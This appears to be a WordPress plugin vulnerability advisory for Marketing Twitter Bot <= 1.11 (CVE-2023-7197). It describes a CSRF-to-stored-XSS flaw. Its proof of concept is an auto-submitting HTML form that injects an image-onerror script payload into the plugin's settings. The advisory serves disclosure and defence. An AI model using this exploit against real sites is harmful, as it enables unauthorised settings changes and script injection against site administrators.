WordPress Plugin Vulnerabilities

Marketing Twitter Bot <= 1.11 - Settings Update to Stored XSS via CSRF

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Have an admin open an HTML page containing the following:

```
<form action="http://example.com/wordpress/wp-admin/admin.php?page=mtb_menu" method="POST">
    <input type="text" name="twitter_mtb_consumer_key" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="twitter_mtb_consumer_secret" value="1">
    <input type="text" name="twitter_mtb_access_token" value="1">
    <input type="text" name="twitter_mtb_access_token_secret" value="1">
    <input type="text" name="mtb" value="true">
</form>
<script>
    document.forms[0].submit();    
</script>
```

Affects Plugins

Plugin icon
wordpress-twitterbot
No known fix

References

CVE
CVE-2023-7197
URL
https://magos-securitas.com/txt/CVE-2023-7197.txt

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://magos-securitas.com
Verified
Yes
WPVDB ID
26deaa7c-e331-42a0-9310-31d08871154c

Timeline

Publicly Published
2024-01-23 (about 3 months ago)
Added
2024-01-23 (about 3 months ago)
Last Updated
2024-01-23 (about 3 months ago)

Other

Published
Title
Published
2024-03-11
Title
LadiApp <= 4.4 - Cross-Site Request Forgery via save_config()
Published
2022-05-04
Title
Code Snippets Extended <= 1.4.7 - RCE via CSRF
Published
2023-12-27
Title
Split Test For Elementor < 1.7.0 - Cross-Site Request Forgery
Published
2022-04-11
Title
Visual Form Builder < 3.0.8 - Entries Deletion/Restoration via CSRF
Published
2022-06-02
Title
HTML2WP <= 1.0.0 - Arbitrary Settings Update via CSRF